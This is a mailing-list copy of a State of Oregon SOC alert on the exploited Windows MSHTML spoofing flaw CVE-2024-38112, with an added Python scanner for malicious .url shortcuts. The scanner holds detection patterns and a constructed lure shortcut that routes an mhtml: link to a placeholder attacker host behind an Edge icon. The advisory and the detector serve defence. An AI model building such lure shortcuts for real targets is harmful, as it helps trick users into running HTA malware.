[CDP-development] TLP:GREEN (Zero-Day Alert Notification) CVE-2024-38112: Microsoft Windows MSHTML Platform Spoofing Vulnerability
CSS Security Operations Services * DAS
css-soc-services at das.oregon.gov
Wed Jul 10 11:40:14 PDT 2024
Good morning,
The SOC Services team is reporting on the vulnerability CVE-2024-38112: Microsoft Windows MSHTML Platform Spoofing Vulnerability. Because of its high visibility and our knowledge of the software installed in the state environment, we are providing this in-depth information:
History: On July 9, 2024, Microsoft released updates for Windows and Windows Server products addressing a spoofing vulnerability in the MSHTML platform. CVE-2024-38112 is currently assigned a CVSSv3 base score of 7.5 (High).
The following products are affected by CVE-2024-38112:
* Windows 10 (multiple versions)
* Windows 11 (multiple versions)
* Microsoft Windows Server (2008, 2012, 2012 R2, 2016, 2019, 2022, and 23H2 - multiple versions)
Please note that the list of products affected by CVE-2024-38112 is extensive; for detailed information, please see the security advisory link below.
Microsoft has released the following security advisory related to CVE-2024-38112: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112
Intelligence: As of July 9, 2024, Microsoft has confirmed that the vulnerability is being exploited in the wild.
Workarounds: There are no workarounds for this vulnerability.
How it works: Attackers use specially crafted Windows Internet Shortcut files (.url extension). The shortcut's URL= target is prefixed with the mhtml: handler, so when the file is clicked, Windows hands the attacker-controlled URL to the retired Internet Explorer (IE) engine rather than to the default browser. By opening the URL in IE instead of the modern and far more secure Edge or Chrome, the attacker gains significant advantages in exploiting the victim's computer, even though the computer is running a current Windows 10/11 operating system. The trick also lets the attacker keep hiding the file's true nature from a user who is intent on opening it and clicks through several pop-up warnings: the file presented as a PDF is actually a malicious HTA (HTML Application) file, which executes and enables remote code execution (RCE).
Post-Exploit: If successfully exploited, this vulnerability allows an attacker to deceive users by presenting misleading information or disguising malicious content as legitimate. This can lead to users disclosing sensitive information or downloading malware onto their systems.
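As an added illustration for the "How it works" section (this script is not part of the original SOC notification and is not code from Microsoft, Tenable or Check Point), the following Python scanner parses Windows .url shortcut files and flags those whose URL= target uses the mhtml: handler, the lure format described above. The two sample shortcut contents are constructed for the example, the hostnames are placeholders, and the function and variable names are our own.

```python
"""Flag Windows Internet Shortcut (.url) files whose target is forced into
the Internet Explorer/MSHTML engine through the mhtml: handler, the lure
used in CVE-2024-38112 attacks.

Added example for this advisory, not code from Microsoft, Tenable or the
Oregon SOC. Sample shortcut contents are constructed; hostnames are
placeholders.
"""
import configparser
import re
import sys
from dataclasses import dataclass, field
from pathlib import Path
from typing import List, Optional

# mhtml: in front of an http(s) URL hands the link to IE regardless of the
# default browser; the trailing "!part" selector is the form seen in lures.
MHTML_PREFIX = re.compile(r"^\s*mhtml:", re.IGNORECASE)
MHTML_PART = re.compile(r"!\S+$")
HTA_REF = re.compile(r"\.hta(\W|$)", re.IGNORECASE)


@dataclass
class Finding:
    name: str
    url: str
    reasons: List[str] = field(default_factory=list)


def parse_url_shortcut(text: str) -> Optional[str]:
    """Return the URL= value of the [InternetShortcut] section, or None.

    .url files are INI-style; the key is case-insensitive and a leading BOM
    is tolerated. Malformed files return None rather than raising.
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text.lstrip("\ufeff"))
    except configparser.Error:
        return None
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            return cp[section].get("url")  # option names are lower-cased
    return None


def analyze_shortcut(name: str, text: str) -> Optional[Finding]:
    """Return a Finding if the shortcut shows the CVE-2024-38112 lure pattern."""
    url = parse_url_shortcut(text)
    if not url:
        return None
    reasons = []
    if MHTML_PREFIX.search(url):
        reasons.append("URL uses the mhtml: handler, which opens the target in IE/MSHTML")
        if MHTML_PART.search(url):
            reasons.append("mhtml: URL ends in a '!part' selector, as in known lures")
    if HTA_REF.search(url):
        reasons.append("URL references an .hta (HTML Application) file")
    if not reasons:
        return None
    return Finding(name, url, reasons)


def scan_directory(root: Path) -> List[Finding]:
    """Recursively check every *.url file under root (e.g. a Downloads folder)."""
    findings = []
    for path in root.rglob("*.url"):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        finding = analyze_shortcut(str(path), text)
        if finding:
            findings.append(finding)
    return findings


# Constructed samples: a normal shortcut and one shaped like the lure
# (a hypothetical attacker host; the Edge icon path disguises the file).
BENIGN_URL_FILE = (
    "[InternetShortcut]\n"
    "URL=https://www.example.org/quarterly-report.pdf\n"
    "IconIndex=0\n"
)
LURE_URL_FILE = (
    "[InternetShortcut]\n"
    "URL=mhtml:http://attacker.invalid/lure/books.pdf!x.htm\n"
    "ShowCommand=7\n"
    "IconIndex=13\n"
    "IconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\n"
)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        hits = scan_directory(Path(sys.argv[1]))
    else:
        hits = [f for f in (analyze_shortcut("benign.url", BENIGN_URL_FILE),
                            analyze_shortcut("lure.url", LURE_URL_FILE)) if f]
    for f in hits:
        print(f"{f.name}: {f.url}")
        for r in f.reasons:
            print(f"  - {r}")
```

Run it with a directory argument (for example a user's Downloads or mail attachment cache) to list shortcuts that hand their target to IE; with no argument it checks the two constructed samples. The mhtml: handler is rare in legitimate shortcuts, so hits are good leads for triage, and a host with a flagged file should be checked for compromise before the July updates are applied, consistent with the Recommended Actions below.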
Indicators of Compromise (IoCs): No known indicators of compromise have been publicly shared at this time.
Tenable Plugins:
As of July 10, 2024, the following vulnerability plugins have been released and are currently in Tenable Security Center:
Plugin | Title | Severity
202043 <https://www.tenable.com/plugins/nessus/202043> | KB5040434: Windows 10 Version 1607 / Windows Server 2016 Security Update (July 2024) | Critical
202042 <https://www.tenable.com/plugins/nessus/202042> | KB5040448: Windows 10 LTS 1507 Security Update (July 2024) | High
202041 <https://www.tenable.com/plugins/nessus/202041> | KB5040490: Windows Server 2008 Security Update (July 2024) | Critical
202040 <https://www.tenable.com/plugins/nessus/202040> | KB5040431: Windows 11 version 21H2 Security Update (July 2024) | High
202039 <https://www.tenable.com/plugins/nessus/202039> | KB5040437: Windows Server 2022 / Azure Stack HCI 22H2 Security Update (July 2024) | Critical
202038 <https://www.tenable.com/plugins/nessus/202038> | KB5040438: Windows 11 version 22H2 / Windows Server version 23H2 Security Update (July 2024) | Critical
202037 <https://www.tenable.com/plugins/nessus/202037> | KB5040427: Windows 10 Version 21H2 / Windows 10 Version 22H2 Security Update (July 2024) | High
202036 <https://www.tenable.com/plugins/nessus/202036> | KB5040442: Windows 11 version 22H2 Security Update (July 2024) | High
202034 <https://www.tenable.com/plugins/nessus/202034> | KB5040456: Windows Server 2012 R2 Security Update (July 2024) | Critical
202028 <https://www.tenable.com/plugins/nessus/202028> | KB5040430: Windows 10 version 1809 / Windows Server 2019 Security Update (July 2024) | Critical
Recommended Actions:
* Verify that hosts have not been compromised before applying patches.
* Apply the appropriate updates provided by the vendor to vulnerable systems immediately after appropriate testing.
* Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.
* Apply the Principle of Least Privilege to all systems and services.
Cyber Security Services
State of Oregon Cyber Security Services
Enterprise Information Services | SOC
Cyber Security Services (CSS)
SOC Hotline: (503) 378-5930 | SOC Services (503) 373-0378
"Ensuring user-friendly, reliable and secure state technology systems that equitably serve Oregonians."